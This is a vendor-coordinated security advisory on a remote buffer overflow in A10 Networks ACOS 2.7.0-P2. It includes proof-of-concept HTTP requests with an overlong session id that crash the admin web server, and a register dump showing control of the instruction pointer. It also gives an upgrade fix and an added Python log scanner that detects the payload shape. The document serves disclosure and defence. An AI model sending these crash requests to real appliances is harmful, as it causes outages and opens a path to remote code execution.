    A10 Networks remote Buffer Overflow in ACOS 2.7.0-P2(build: 53)

    02-04-2014

    Quantum Leap Advisory: A10 Networks remote Buffer Overflow in ACOS[1] 2.7.0-P2 – Advisory #QLA140402
    Affected Product: ACOS 2.7.0-P2(build: 53)  (older versions may be affected too) (Tested on SoftAX[2])
    Credits: Vulnerability discovered by Francesco Perna of Quantum Leap s.r.l

    Executive Summary

    Using a specially crafted HTTP request to the administration web server, it is possible to exploit a lack of user input validation. Successful exploitation of the vulnerability may result in remote code execution. Unsuccessful exploitation of the vulnerability may result in a Denial of Service of the administrative interface.

    Proof of Concept

    By submitting arbitrary input in the HTTP request, it is possible to cause a buffer overflow. If you provide an overly long “session id” in the request, the web server crashes. To reproduce the crash, you can send one of the following requests to the web server:

    GET /US/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/sys_reboot.html HTTP/1.1
    Host: 192.168.1.210
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: keep-alive

     

    GET /US/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/sys_reboot.html HTTP/1.1
    Host: 192.168.1.210
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: keep-alive

    Once the crash occurs, the register state of the SoftAX appliance is as follows:

    rax 0x0 0
    rbx 0x1e30300 31654656
    rcx 0x6 6
    rdx 0xffffffff 4294967295
    rsi 0xcac18f12 3401682706
    rdi 0x4141414141414141 4702111234474983745
    rbp 0x4141414141414141 0x4141414141414141
    rsp 0x7fffbdf9b400 0x7fffbdf9b400
    r8 0x2000 8192
    r9 0x20 32
    r10 0x0 0
    r11 0x7f10b4cec180 139709729653120
    r12 0x0 0
    r13 0x1e30318 31654680
    r14 0x1e30300 31654656
    r15 0x1e33b58 31669080
    rip 0x524149 0x524149
    eflags 0x10246 [ PF ZF IF RF ]
    cs 0x33 51
    ss 0x2b 43
    ds 0x0 0
    es 0x0 0
    fs 0x0 0
    gs 0x0 0
    fctrl 0x37f 895
    fstat 0x0 0
    ftag 0xffff 65535
    fiseg 0x0 0
    fioff 0x0 0
    foseg 0x0 0
    fooff 0x0 0
    fop 0x0 0
    mxcsr 0x1f80 [ IM DM ZM OM UM PM ]

    Solution

    To fix the A10 Networks remote Buffer Overflow, you have to upgrade to at least version 2.7.0-p6.
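
    A log check for the request shape shown in the Proof of Concept, added here as an example (it is not part of the original advisory or of A10's software): it flags request lines whose second path segment, the “session id” position, is overly long. The 64-character threshold, the function names and the sample lines are assumptions constructed for illustration; set the threshold to the session id length your appliance actually issues.

```python
import re

# Assumption: legitimate session ids are much shorter than this value.
# Tune it to the length your ACOS version really issues.
MAX_SESSION_ID_LEN = 64

# HTTP request line: METHOD <target> HTTP/x.y
REQUEST_LINE = re.compile(r"^[A-Z]+ (?P<target>\S+) HTTP/\d\.\d$")


def session_id_segment(request_line):
    """Return the second path segment of /<lang>/<session id>/<page>, or None.

    The advisory's requests use /US/ as the first segment; any first segment
    is accepted here (assumption), since other values are not documented.
    """
    match = REQUEST_LINE.match(request_line.strip())
    if match is None:
        return None
    path = match.group("target").split("?", 1)[0]
    segments = [s for s in path.split("/") if s]
    if len(segments) < 3:
        return None
    return segments[1]


def scan(request_lines, max_len=MAX_SESSION_ID_LEN):
    """Return (line_number, segment_length) for every overlong session id.

    The raw segment is measured: percent-decoding can only shorten it,
    so the raw length is the conservative upper bound.
    """
    findings = []
    for number, line in enumerate(request_lines, start=1):
        segment = session_id_segment(line)
        if segment is not None and len(segment) > max_len:
            findings.append((number, len(segment)))
    return findings


# Constructed sample request lines (not captured traffic).
SAMPLE_REQUEST_LINES = [
    "GET /US/3f9c2a7be1d04c55/sys_reboot.html HTTP/1.1",
    "GET /US/" + "A" * 100 + "/sys_reboot.html HTTP/1.1",
    "GET /index.html HTTP/1.1",
    "GET /US/" + "A" * 600 + "/sys_reboot.html HTTP/1.1",
]

if __name__ == "__main__":
    for number, length in scan(SAMPLE_REQUEST_LINES):
        print(f"line {number}: session id segment of {length} characters")
```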

    Disclosure Timeline

    2013-05-11 – A10 Networks remote Buffer Overflow discovered
    2013-05-28 – Initial vendor notification
    2013-05-30 – The vendor acknowledged the vulnerability (bug 128069)
    2014-03-28 – The vendor fixed the vulnerability[3]
    2014-04-02 – Public advisory

    References

    [1] http://www.a10networks.com/about/technology_platform_acos.php
    [2] http://www.a10networks.com/glossary/SoftAX.php
    [3] https://www.a10networks.com/support-axseries/downloads/AX_Series_270-P6_RelNotes_20140328.pdf